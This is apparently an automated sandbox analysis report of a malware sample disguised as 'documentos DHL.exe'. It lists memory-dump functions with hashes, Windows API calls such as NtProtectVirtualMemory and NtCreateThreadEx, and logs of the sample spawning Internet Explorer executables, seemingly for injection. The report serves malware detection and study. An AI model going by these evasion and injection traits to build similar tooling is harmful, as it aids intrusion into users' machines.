Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ExtExport.exePID: 8784, Parent PID: 7424COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	56.4%
Total number of Nodes:	94
Total number of Limit Nodes:	6

Executed Functions

Function 02A03D68 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
a*NQ, xrefs: 02A03DB1
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: ed811cc0fb70ad92f3e942c7244a13b14084fdac56059009904b27a1b81406a1
Instruction ID: e05ef59b2706eeb6a4720b9a48658a06633b09350902bbf5680eeb1a06299716
Opcode Fuzzy Hash: ed811cc0fb70ad92f3e942c7244a13b14084fdac56059009904b27a1b81406a1
Instruction Fuzzy Hash: 33B1DE752043898BCB34CF29D8E93DA37B2EF59350F94822ADC9D8B255D7314A46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02A03CFA Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
a*NQ, xrefs: 02A03DB1
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 4af88e95fd24d75b3c84809663c574de59e41e4ee5a8914432e12b7b992111b4
Instruction ID: 6fcaf61b9f747cf6c27bbba885f6de3cb0910e8f5200675eded5af2a3841b128
Opcode Fuzzy Hash: 4af88e95fd24d75b3c84809663c574de59e41e4ee5a8914432e12b7b992111b4
Instruction Fuzzy Hash: 82B12375204789CFCB718F28D8E93DA37B6EF19350F94822ECC998B656C7354686CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A03CB1 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
a*NQ, xrefs: 02A03DB1
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 654ab0a2f0d4a2b8a2c346ef8bc746c678a79a7c27edb70883b5e88dfb80e92a
Instruction ID: 62b8e4e7a2266f93548e9821a0b6aff92f360408104955a8909e9d0508d4fa2b
Opcode Fuzzy Hash: 654ab0a2f0d4a2b8a2c346ef8bc746c678a79a7c27edb70883b5e88dfb80e92a
Instruction Fuzzy Hash: 44B1F2752047898BCF74CF2898E93DA37B2EF59350F94812ECC998B255C7354A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A03DE6 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
a*NQ, xrefs: 02A03DB1
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: 78fd4d89c0c0ee6e04ccdd9742632769afd81d9d8575e734a9ecad07fb035bf3
Instruction ID: b14f06d0d67ceae11b6f2e897ee0ab8be62739bbc26b7ae638bf70df741b7639
Opcode Fuzzy Hash: 78fd4d89c0c0ee6e04ccdd9742632769afd81d9d8575e734a9ecad07fb035bf3
Instruction Fuzzy Hash: 03B11475108789CBCB718F2898E93DA37B6FF18350F84822ECC998B656C7355686CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A03CE9 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
a*NQ, xrefs: 02A03DB1
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[$a*NQ
API String ID: 0-809854453
Opcode ID: e4cc81c6b8ba124ad48c4c4f03d6fd8d4577ae868638c5b5e907e7a280de8010
Instruction ID: 80811515813a2c7ab5a222364a34a50a6d18b91dd31256f4c6c9bf7793ee9b6c
Opcode Fuzzy Hash: e4cc81c6b8ba124ad48c4c4f03d6fd8d4577ae868638c5b5e907e7a280de8010
Instruction Fuzzy Hash: 6EA1D0752043498BDF74CF28D8E93DA37B2EF59350F94812ADC9E8B255C7354A46CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02A04376 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 07bb8b94de92a00b2648219d5033a203316f1cb81ee36fee6db0bb1b89c1ff1e
Instruction ID: 8c3abf3f8d010d7ce11215b835105b950f62d28735d98a767847a6759eba1439
Opcode Fuzzy Hash: 07bb8b94de92a00b2648219d5033a203316f1cb81ee36fee6db0bb1b89c1ff1e
Instruction Fuzzy Hash: A4E123B1508B88CFCB329F7899A93DA7BB6FF19350F84412ECC898B606C7755589CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02A0412A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 222
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-4B255A00), ref: 02A042EB

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0`\$[
API String ID: 2706961497-2832767952
Opcode ID: 6c6550a12df1dc286dceae989700c1a2f736e1866a8b801434874e694fd9e030
Instruction ID: 734abb6487b91574d475dd4b305376b3d8908313f7970d80641cc474d9388056
Opcode Fuzzy Hash: 6c6550a12df1dc286dceae989700c1a2f736e1866a8b801434874e694fd9e030
Instruction Fuzzy Hash: 84910775608789CFCB318F3998A93DA3BB2EF55350F84812ECC998B656C735068ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 02A04279 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 218
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-4B255A00), ref: 02A042EB

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0`\$[
API String ID: 2706961497-2832767952
Opcode ID: e0b44a5ed34b1eb44de65c05b228c589fa3f09e007a1165e0ab6307c8ebf2e07
Instruction ID: 439be55af23fc94a39d7adccb07023e42f8c1a351ae7c85f1b3ade35ed54c57b
Opcode Fuzzy Hash: e0b44a5ed34b1eb44de65c05b228c589fa3f09e007a1165e0ab6307c8ebf2e07
Instruction Fuzzy Hash: 5C912675108789CFCB319F3999A93DA3BB6FF15350F84822ECC998B646C7751689CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A0422B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 216
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-4B255A00), ref: 02A042EB

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0`\$[
API String ID: 2706961497-2832767952
Opcode ID: d74fcc49bafd8ca4ef30669ad0684de4776adfcd3f47009922e00d1ca6af9eb0
Instruction ID: 37bac6e27929976af49d5ed4445faaa921513a8ba45434d26a7bff315d0904aa
Opcode Fuzzy Hash: d74fcc49bafd8ca4ef30669ad0684de4776adfcd3f47009922e00d1ca6af9eb0
Instruction Fuzzy Hash: 56911771508789CBCB319F7999E93DA3BB6FF59350F84812ECC998B646C7350689CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A03F1A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 6f83f19fd7af53b529e941320e7969b5190eeb04dd766824030183e808d83a79
Instruction ID: 895a7a63856a3a116b3a9b763737b1a6d9ffd83b3e80d40f70034162387cef81
Opcode Fuzzy Hash: 6f83f19fd7af53b529e941320e7969b5190eeb04dd766824030183e808d83a79
Instruction Fuzzy Hash: F8911675208789CBCB719F3998A93DA37B6FF55350F84812ECC998B646C7350689CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A04035 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 211
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-4B255A00), ref: 02A042EB

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0`\$[
API String ID: 2706961497-2832767952
Opcode ID: d0660d6d6419e78a2842ddcbf2705632ad876741ee0f9651e5cdb99be951a598
Instruction ID: 43b9cbdf3c7e2a4809c759afbcfcbd3fa44a845580286f889304a35bbf069292
Opcode Fuzzy Hash: d0660d6d6419e78a2842ddcbf2705632ad876741ee0f9651e5cdb99be951a598
Instruction Fuzzy Hash: 4F812871108789CBCB319F3999E93DA37B6FF15350F84822ECC998B646C7350689CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A0423A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-4B255A00), ref: 02A042EB

Strings

0`\, xrefs: 02A03EEB
[, xrefs: 02A03F04

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 0`\$[
API String ID: 2706961497-2832767952
Opcode ID: 858d20617238cca59f23c0888e93fee1f906cad0e12e9a36743c5f2eb71a729b
Instruction ID: 83d820083ffb74847165a824312170fb5bfefacf2cf91537b8b2254b549dfa01
Opcode Fuzzy Hash: 858d20617238cca59f23c0888e93fee1f906cad0e12e9a36743c5f2eb71a729b
Instruction Fuzzy Hash: 2471CF7460874A8BDF348F299DE93DA37B2EF55350F84822EDC9D9B255C3350A4ACB12

Uniqueness

Uniqueness Score: -1.00%

Function 02A08A4E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`W', xrefs: 02A08BA2

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID:
String ID: `W'
API String ID: 0-3419779968
Opcode ID: fefe85c9ff21e4822c70a8da740bff7ad6b5a7721bfe065206f442e50a1749b1
Instruction ID: 6bafa943809c2c45b2812ad5fde58d3ddf6029a0d130426f1b1566af74f27cfa
Opcode Fuzzy Hash: fefe85c9ff21e4822c70a8da740bff7ad6b5a7721bfe065206f442e50a1749b1
Instruction Fuzzy Hash: A4510D70004784CFDB629F28C9C93D2BBB6FF16750F5981AACC468F61AC7389481CB19

Uniqueness

Uniqueness Score: -1.00%

Function 02A079DC Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 159
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 02A079EC

Strings

'K={, xrefs: 02A20630

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: 'K={
API String ID: 3472027048-3444689584
Opcode ID: a00c7939bdfe6d8dddc53f26e41fd170205f1841e23ccacdbfd14f9b3fde6dff
Instruction ID: 70ba24a450a56a53174366c128346d9994080ba605137f7026e6f0cd15e3b456
Opcode Fuzzy Hash: a00c7939bdfe6d8dddc53f26e41fd170205f1841e23ccacdbfd14f9b3fde6dff
Instruction Fuzzy Hash: 7641ED72918388DBCB251F38DC817D6BBF1FF59320F150A5ECA8086A52D770958BCB81

Uniqueness

Uniqueness Score: -1.00%

Function 02A08932 Relevance: 1.6, APIs: 1, Instructions: 131nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-0000000118F6328C), ref: 02A08A2C

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f64461354cc6799063744642da263c7c852730a46dce628af50da0e0d0615619
Instruction ID: afe25908881286dbee0f974e92dedb4e66dfa0f52cf32afe351ffd58276a6183
Opcode Fuzzy Hash: f64461354cc6799063744642da263c7c852730a46dce628af50da0e0d0615619
Instruction Fuzzy Hash: 755113B1104B888FC732AF2899483D6BBF6FF14760F51416ECC868BB26C7785585CB49

Uniqueness

Uniqueness Score: -1.00%

Function 02A08897 Relevance: 1.6, APIs: 1, Instructions: 127nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-0000000118F6328C), ref: 02A08A2C

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 702dfae1b3b75c1f9653604c5c06a353962a682ae9a0c09fe677195ade730615
Instruction ID: afb56e1e5128c2b1422b55ade4483a94f954427dcbf150ee54365be1185b1466
Opcode Fuzzy Hash: 702dfae1b3b75c1f9653604c5c06a353962a682ae9a0c09fe677195ade730615
Instruction Fuzzy Hash: 69413A716003448FDB309F28CE893DA77B6EF55364F51826ACC8ADB266E7389985CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02A0890D Relevance: 1.6, APIs: 1, Instructions: 95nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-0000000118F6328C), ref: 02A08A2C

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e9332c450b66ac533ba1c59700d8502d9dbfc355c075415e3363af31acea5174
Instruction ID: 6e8121c677feeb2d56410a6431e9581bdd0d8fd89b824b1b496577fd0ec1a766
Opcode Fuzzy Hash: e9332c450b66ac533ba1c59700d8502d9dbfc355c075415e3363af31acea5174
Instruction Fuzzy Hash: 9C3139711053888FD720AF24CD893EA7BF2EF45360F5241AECC8ACB266D7385986CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FE97 Relevance: 1.5, APIs: 1, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtCreateThreadEx.NTDLL(00000001), ref: 02A2004F

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fb1333ce0e5df4acfe9edcc08537d9355ab5963a8097403e88a22627495864bd
Instruction ID: 579d2459cf36108b97acbcbfb11231c2330010739d50d27889b0ee4066426b3a
Opcode Fuzzy Hash: fb1333ce0e5df4acfe9edcc08537d9355ab5963a8097403e88a22627495864bd
Instruction Fuzzy Hash: 6001A7311483A5CFCF388E3C8AD43ED77729B95304F51412BC446CBA18CB315989CA01

Uniqueness

Uniqueness Score: -1.00%

Function 02A065BA Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 02A065BA

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: InformationProcess
String ID:
API String ID: 1801817001-0
Opcode ID: 65b1315492ecc79fddea89fcaf5be89038634411b9a6b8e604440b5019adeccb
Instruction ID: c94b996d080c0e508f9818d9a419dc1b96b3789a655268bb77ada254c84b6d76
Opcode Fuzzy Hash: 65b1315492ecc79fddea89fcaf5be89038634411b9a6b8e604440b5019adeccb
Instruction Fuzzy Hash: E4F0593601EBE7CBCB270B7498A019C7FB41F83615B1C09D8C1E18F493CA22589ADB96

Uniqueness

Uniqueness Score: -1.00%

Function 02A1B21F Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?), ref: 02A1B35F

Memory Dump Source

Source File: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_2a00000_ExtExport.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a07938691032f5b56782a2f9468f9aae203f378000137c72aa4a8808069c1f6c
Instruction ID: dca168e8f06011f15b7986e2c855a7f969436c83f40a0ed3ecba220f4b3df5aa
Opcode Fuzzy Hash: a07938691032f5b56782a2f9468f9aae203f378000137c72aa4a8808069c1f6c
Instruction Fuzzy Hash: B421907150434A9BCF709E3889297DBB7E8AF59360F860A1EDDCAD7220D7305AC1CB56

Uniqueness

Uniqueness Score: -1.00%

Source: unknown	Process created: C:\Users\user\Desktop\documentos DHL.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ExtExport.exe C:\Users\user\Desktop\documentos DHL.exe
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Users\user\Desktop\documentos DHL.exe	Jump to behavior
